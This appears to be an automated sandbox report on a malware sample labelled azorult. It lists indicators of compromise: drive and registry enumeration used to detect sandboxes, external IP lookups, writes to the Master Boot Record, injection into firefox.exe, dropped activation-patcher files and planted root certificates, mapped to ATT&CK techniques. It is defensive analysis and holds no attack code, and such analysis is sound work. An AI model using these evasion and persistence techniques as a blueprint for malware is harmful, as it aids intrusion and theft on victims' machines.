azorult | c59ce6ed0ebcfce3bc9c950ac699944405a6447e40a24697482cf64a0fb37e61

Processes:

md2_2efs.exemd2_2efs.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 26 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
644	ipinfo.io
738	ipinfo.io
892	ipinfo.io
135	ip-api.com
167	ipinfo.io
341	ipinfo.io
393	ipinfo.io
510	ip-api.com
897	ipinfo.io
935	ipinfo.io
597	ipinfo.io
535	checkip.amazonaws.com
697	ipinfo.io
741	ipinfo.io
90	api.ipify.org
164	ipinfo.io
306	checkip.amazonaws.com
359	ipinfo.io
361	ipinfo.io
946	ipinfo.io
677	checkip.amazonaws.com
178	ipinfo.io
299	ipinfo.io
309	ipinfo.io
352	ipinfo.io
356	ipinfo.io

Maps connected drives based on registry 3 TTPs 4 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

multitimer.exemultitimer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe

Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

Setup.exeAD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	AD754B4D3FE2C4EE.exe
File opened for modification	\??\PhysicalDrive0	AD754B4D3FE2C4EE.exe

Drops file in System32 directory 4 IoCs

Processes:

cmd.execmd.exe

description	ioc	process
File opened for modification	C:\Windows\System32\SppExtComObjHook.dll	cmd.exe
File created	C:\Windows\System32\SppExtComObjPatcher.exe	cmd.exe
File opened for modification	C:\Windows\System32\SppExtComObjPatcher.exe	cmd.exe
File created	C:\Windows\System32\SppExtComObjHook.dll	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Setup.exe

pid process

2388 Setup.exe

pid	process
2388	Setup.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

AD754B4D3FE2C4EE.exeD97A.tmp.exeE448.tmp.exe

description	pid	process	target process
PID 4812 set thread context of 2088	4812	AD754B4D3FE2C4EE.exe	firefox.exe
PID 4812 set thread context of 4612	4812	AD754B4D3FE2C4EE.exe	firefox.exe
PID 2896 set thread context of 2108	2896	D97A.tmp.exe	D97A.tmp.exe
PID 4812 set thread context of 1648	4812	AD754B4D3FE2C4EE.exe	gcttt.exe
PID 3988 set thread context of 5036	3988	E448.tmp.exe	E448.tmp.exe

Drops file in Windows directory 18 IoCs

Processes:

FakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exemultitimer.exeFakeClient.exeFakeClient.exemultitimer.exeFakeClient.exe

description	ioc	process
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

6308 5196 WerFault.exe Setup.exe
7444 6808 WerFault.exe Setup.exe

pid	pid_target	process	target process
6308	5196	WerFault.exe	Setup.exe
7444	6808	WerFault.exe	Setup.exe

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

AD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	AD754B4D3FE2C4EE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	AD754B4D3FE2C4EE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	AD754B4D3FE2C4EE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	AD754B4D3FE2C4EE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	AD754B4D3FE2C4EE.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

7512 timeout.exe

pid	process
7512	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

multitimer.exemultitimer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe

Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXENETSTAT.EXE

pid process

688 NETSTAT.EXE
1216 NETSTAT.EXE

pid	process
688	NETSTAT.EXE
1216	NETSTAT.EXE

Kills process with taskkill 28 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeTASKKILL.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2200	taskkill.exe
2784	taskkill.exe
6260	taskkill.exe
11568	taskkill.exe
1836	taskkill.exe
2192	taskkill.exe
4120	taskkill.exe
3372	taskkill.exe
576	taskkill.exe
4200	taskkill.exe
7348	taskkill.exe
8384	taskkill.exe
9768	taskkill.exe
4032	taskkill.exe
3728	taskkill.exe
6724	taskkill.exe
3512	taskkill.exe
4024	taskkill.exe
3132	taskkill.exe
4020	taskkill.exe
7400	TASKKILL.exe
4756	taskkill.exe
7216	taskkill.exe
6964	taskkill.exe
5052	taskkill.exe
8768	taskkill.exe
3560	taskkill.exe
5828	taskkill.exe

Modifies data under HKEY_USERS 13 IoCs

Processes:

SppExtComObj.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588	SppExtComObj.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588\DiscoveredKeyManagementServiceIpAddress = "1.2.3.4"	SppExtComObj.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f	SppExtComObj.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\85dd8b5f-eaa4-4af3-a628-cce9e77c9a03	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT	SppExtComObj.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588	reg.exe

Modifies registry class 2 IoCs

Processes:

Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

1640 reg.exe
4016 reg.exe

pid	process
1640	reg.exe
4016	reg.exe

Modifies system certificate store 2 TTPs 14 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

certmgr.execertmgr.exeaskinstall20.execertmgr.execertmgr.exeSetup.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8	certmgr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8	certmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98	certmgr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8	certmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98	certmgr.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98	certmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98	certmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98	certmgr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8	certmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98	certmgr.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

6792 regedit.exe
7352 regedit.exe
Runs net.exe
Runs ping.exe 1 TTPs 8 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

4664 PING.EXE
4940 PING.EXE
1340 PING.EXE
5872 PING.EXE
8088 PING.EXE
6488 PING.EXE
4088 PING.EXE
4440 PING.EXE

pid	process
